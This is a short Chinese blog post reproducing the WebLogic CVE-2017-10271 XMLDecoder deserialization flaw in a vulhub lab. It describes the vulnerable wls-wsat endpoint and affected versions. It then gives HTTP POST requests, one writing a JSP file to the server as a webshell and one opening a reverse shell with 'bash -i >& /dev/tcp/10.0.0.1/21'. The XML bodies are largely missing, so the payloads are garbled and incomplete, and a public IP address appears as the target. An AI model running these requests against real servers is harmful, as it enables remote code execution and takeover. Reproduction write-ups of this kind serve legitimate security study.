Weblogic CVE-2017-10271漏洞复现

原理:CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下: http://101.32.30.69:7001/wls-wsat/CoordinatorPortType  post数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

环境:vulhub

影响范围:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。

验证截图:


写入webs hell

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: your-ip:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 638

   

   

   

   

    servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp

   

   

<% out.print("test"); %>

    ]]>

   

   

   

   

   

   

   


访问

http://101.32.30.69:7001/bea_wls_internal/test.jsp

反弹shell方法

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: your-ip:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 633

/bin/bash

-c

bash -i >& /dev/tcp/10.0.0.1/21 0>&1




你可能感兴趣的:(Weblogic CVE-2017-10271漏洞复现)